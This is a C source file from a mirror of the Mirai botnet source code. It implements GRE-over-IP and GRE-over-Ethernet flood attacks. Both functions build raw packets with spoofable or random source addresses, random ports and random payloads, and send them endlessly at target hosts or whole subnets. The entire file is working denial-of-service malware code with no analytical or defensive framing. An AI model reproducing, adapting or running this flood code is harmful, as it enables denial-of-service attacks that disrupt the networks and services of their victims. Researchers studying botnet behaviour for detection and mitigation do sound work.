mirror of
https://github.com/jgamblin/Mirai-Source-Code
synced 2025-05-15 13:54:12 +00:00
319 lines
11 KiB
C
Executable File
319 lines
11 KiB
C
Executable File
#define _GNU_SOURCE
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#ifdef DEBUG
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#include <stdio.h>
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#endif
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#include <stdlib.h>
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#include <unistd.h>
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#include <sys/socket.h>
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#include <linux/ip.h>
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#include <linux/if_ether.h>
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#include <errno.h>
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#include "includes.h"
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#include "attack.h"
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#include "protocol.h"
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#include "util.h"
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#include "checksum.h"
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#include "rand.h"
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void attack_gre_ip(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
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{
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int i, fd;
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char **pkts = calloc(targs_len, sizeof (char *));
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uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
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uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
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uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
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BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, TRUE);
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port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
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port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
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int data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 512);
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BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
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BOOL gcip = attack_get_opt_int(opts_len, opts, ATK_OPT_GRE_CONSTIP, FALSE);
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uint32_t source_ip = attack_get_opt_int(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
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if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
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{
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#ifdef DEBUG
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printf("Failed to create raw socket. Aborting attack\n");
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#endif
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return;
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}
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i = 1;
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if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
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{
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#ifdef DEBUG
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printf("Failed to set IP_HDRINCL. Aborting\n");
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#endif
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close(fd);
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return;
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}
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for (i = 0; i < targs_len; i++)
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{
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struct iphdr *iph;
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struct grehdr *greh;
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struct iphdr *greiph;
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struct udphdr *udph;
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pkts[i] = calloc(1510, sizeof (char *));
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iph = (struct iphdr *)(pkts[i]);
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greh = (struct grehdr *)(iph + 1);
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greiph = (struct iphdr *)(greh + 1);
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udph = (struct udphdr *)(greiph + 1);
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// IP header init
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iph->version = 4;
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iph->ihl = 5;
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iph->tos = ip_tos;
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iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
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iph->id = htons(ip_ident);
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iph->ttl = ip_ttl;
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if (dont_frag)
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iph->frag_off = htons(1 << 14);
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iph->protocol = IPPROTO_GRE;
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iph->saddr = source_ip;
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iph->daddr = targs[i].addr;
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// GRE header init
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greh->protocol = htons(ETH_P_IP); // Protocol is 2 bytes
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// Encapsulated IP header init
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greiph->version = 4;
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greiph->ihl = 5;
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greiph->tos = ip_tos;
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greiph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
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greiph->id = htons(~ip_ident);
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greiph->ttl = ip_ttl;
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if (dont_frag)
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greiph->frag_off = htons(1 << 14);
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greiph->protocol = IPPROTO_UDP;
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greiph->saddr = rand_next();
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if (gcip)
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greiph->daddr = iph->daddr;
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else
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greiph->daddr = ~(greiph->saddr - 1024);
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// UDP header init
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udph->source = htons(sport);
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udph->dest = htons(dport);
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udph->len = htons(sizeof (struct udphdr) + data_len);
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}
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while (TRUE)
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{
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for (i = 0; i < targs_len; i++)
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{
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char *pkt = pkts[i];
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struct iphdr *iph = (struct iphdr *)pkt;
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struct grehdr *greh = (struct grehdr *)(iph + 1);
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struct iphdr *greiph = (struct iphdr *)(greh + 1);
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struct udphdr *udph = (struct udphdr *)(greiph + 1);
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char *data = (char *)(udph + 1);
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// For prefix attacks
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if (targs[i].netmask < 32)
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iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
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if (source_ip == 0xffffffff)
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iph->saddr = rand_next();
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if (ip_ident == 0xffff)
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{
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iph->id = rand_next() & 0xffff;
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greiph->id = ~(iph->id - 1000);
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}
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if (sport == 0xffff)
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udph->source = rand_next() & 0xffff;
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if (dport == 0xffff)
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udph->dest = rand_next() & 0xffff;
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if (!gcip)
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greiph->daddr = rand_next();
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else
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greiph->daddr = iph->daddr;
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if (data_rand)
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rand_str(data, data_len);
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iph->check = 0;
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iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
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greiph->check = 0;
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greiph->check = checksum_generic((uint16_t *)greiph, sizeof (struct iphdr));
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udph->check = 0;
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udph->check = checksum_tcpudp(greiph, udph, udph->len, sizeof (struct udphdr) + data_len);
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targs[i].sock_addr.sin_family = AF_INET;
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targs[i].sock_addr.sin_addr.s_addr = iph->daddr;
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targs[i].sock_addr.sin_port = 0;
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sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
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}
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#ifdef DEBUG
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if (errno != 0)
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printf("errno = %d\n", errno);
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break;
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#endif
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}
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}
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void attack_gre_eth(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
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{
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int i, fd;
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char **pkts = calloc(targs_len, sizeof (char *));
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uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
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uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
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uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
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BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, TRUE);
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port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
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port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
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int data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 512);
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BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
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BOOL gcip = attack_get_opt_int(opts_len, opts, ATK_OPT_GRE_CONSTIP, FALSE);
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uint32_t source_ip = attack_get_opt_int(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
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if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
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{
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#ifdef DEBUG
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printf("Failed to create raw socket. Aborting attack\n");
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#endif
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return;
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}
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i = 1;
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if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
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{
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#ifdef DEBUG
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printf("Failed to set IP_HDRINCL. Aborting\n");
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#endif
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close(fd);
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return;
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}
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for (i = 0; i < targs_len; i++)
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{
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struct iphdr *iph;
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struct grehdr *greh;
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struct ethhdr *ethh;
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struct iphdr *greiph;
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struct udphdr *udph;
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uint32_t ent1, ent2, ent3;
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pkts[i] = calloc(1510, sizeof (char *));
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iph = (struct iphdr *)(pkts[i]);
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greh = (struct grehdr *)(iph + 1);
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ethh = (struct ethhdr *)(greh + 1);
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greiph = (struct iphdr *)(ethh + 1);
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udph = (struct udphdr *)(greiph + 1);
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// IP header init
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iph->version = 4;
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iph->ihl = 5;
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iph->tos = ip_tos;
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iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct ethhdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
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iph->id = htons(ip_ident);
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iph->ttl = ip_ttl;
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if (dont_frag)
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iph->frag_off = htons(1 << 14);
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iph->protocol = IPPROTO_GRE;
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iph->saddr = source_ip;
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iph->daddr = targs[i].addr;
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// GRE header init
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greh->protocol = htons(PROTO_GRE_TRANS_ETH); // Protocol is 2 bytes
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// Ethernet header init
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ethh->h_proto = htons(ETH_P_IP);
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// Encapsulated IP header init
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greiph->version = 4;
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greiph->ihl = 5;
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greiph->tos = ip_tos;
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greiph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
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greiph->id = htons(~ip_ident);
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greiph->ttl = ip_ttl;
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if (dont_frag)
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greiph->frag_off = htons(1 << 14);
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greiph->protocol = IPPROTO_UDP;
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greiph->saddr = rand_next();
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if (gcip)
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greiph->daddr = iph->daddr;
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else
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greiph->daddr = ~(greiph->saddr - 1024);
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// UDP header init
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udph->source = htons(sport);
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udph->dest = htons(dport);
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udph->len = htons(sizeof (struct udphdr) + data_len);
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}
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while (TRUE)
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{
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for (i = 0; i < targs_len; i++)
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{
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char *pkt = pkts[i];
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struct iphdr *iph = (struct iphdr *)pkt;
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struct grehdr *greh = (struct grehdr *)(iph + 1);
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struct ethhdr *ethh = (struct ethhdr *)(greh + 1);
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struct iphdr *greiph = (struct iphdr *)(ethh + 1);
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struct udphdr *udph = (struct udphdr *)(greiph + 1);
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char *data = (char *)(udph + 1);
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uint32_t ent1, ent2, ent3;
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// For prefix attacks
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if (targs[i].netmask < 32)
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iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
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if (source_ip == 0xffffffff)
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iph->saddr = rand_next();
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if (ip_ident == 0xffff)
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{
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iph->id = rand_next() & 0xffff;
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greiph->id = ~(iph->id - 1000);
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}
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if (sport == 0xffff)
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udph->source = rand_next() & 0xffff;
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if (dport == 0xffff)
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udph->dest = rand_next() & 0xffff;
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if (!gcip)
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greiph->daddr = rand_next();
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else
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greiph->daddr = iph->daddr;
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ent1 = rand_next();
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ent2 = rand_next();
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ent3 = rand_next();
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util_memcpy(ethh->h_dest, (char *)&ent1, 4);
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util_memcpy(ethh->h_source, (char *)&ent2, 4);
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util_memcpy(ethh->h_dest + 4, (char *)&ent3, 2);
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util_memcpy(ethh->h_source + 4, (((char *)&ent3)) + 2, 2);
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if (data_rand)
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rand_str(data, data_len);
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iph->check = 0;
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iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
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greiph->check = 0;
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greiph->check = checksum_generic((uint16_t *)greiph, sizeof (struct iphdr));
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udph->check = 0;
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udph->check = checksum_tcpudp(greiph, udph, udph->len, sizeof (struct udphdr) + data_len);
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targs[i].sock_addr.sin_family = AF_INET;
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targs[i].sock_addr.sin_addr.s_addr = iph->daddr;
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targs[i].sock_addr.sin_port = 0;
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sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct ethhdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
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}
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#ifdef DEBUG
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if (errno != 0)
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printf("errno = %d\n", errno);
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break;
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#endif
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}
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}
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